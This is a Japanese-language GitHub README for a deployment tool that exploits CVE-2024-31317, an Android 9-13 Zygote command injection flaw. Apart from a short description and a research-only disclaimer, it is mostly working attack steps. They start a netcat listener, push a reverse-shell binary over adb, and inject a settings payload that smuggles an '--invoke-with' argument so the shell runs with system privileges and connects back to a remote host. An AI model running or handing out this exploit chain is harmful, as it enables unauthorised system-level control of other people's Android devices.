
CVE-2024-31317 Android Zygoteコマンドインジェクション脆弱性の研究・展開ツール | Android 9-13 エクスプロイトフレームワーク
本プロジェクトはセキュリティ研究および教育目的のみに使用されます。本ツールを使用した無断のテストは違法です。作者はいかなる悪用や損害に対しても責任を負いません。
CVE-2024-31317 は、Android 9 から Android 13 のデバイスに影響する深刻なセキュリティ脆弱性であり、WRITE_SECURE_SETTINGS 権限を持つアプリケーションがコマンドインジェクションによってシステムレベルの権限で実行できるようになります。
本プロジェクトは、この脆弱性の詳細な技術分析、概念実証コード、および自動化されたデプロイツールを提供します。
CVE-2024-31317-Deployer/
├── README.md
├── LICENSE
├── VULNERABILITY_ANALYSIS.md
├── reverse_shell.c
├── compile.sh
├── payloads/
├── scripts/
└── docs/
git clone https://github.com/fcy10012/CVE-2024-31317-Deployer.git
cd CVE-2024-31317-Deployer
chmod +x compile.sh
./compile.sh
# 启动监听器
nc -lvnp 4444
# 推送并执行
adb push bin/reverse_shell_arm64 /data/local/tmp/reverse_shell
adb shell chmod 755 /data/local/tmp/reverse_shell
# 注入payload
adb shell settings put global hidden_api_blacklist_exemptions "L*\n--invoke-with /data/local/tmp/reverse_shell 192.168.1.100 4444"
# 触发漏洞
adb shell stop && adb shell start
本プロジェクトはセキュリティ研究および教育目的のみで使用されます。本ツールを使用することにより、以下に同意したものとみなされます:
本プロジェクトは MIT ライセンスを採用しています - 詳細は LICENSE ファイルを参照してください
fcy10012 - GitHub
参考プロジェクト: WebLDix/CVE-2024-31317-PoC-Deployer
⭐ このプロジェクトが役に立った場合は、スターを付けてください!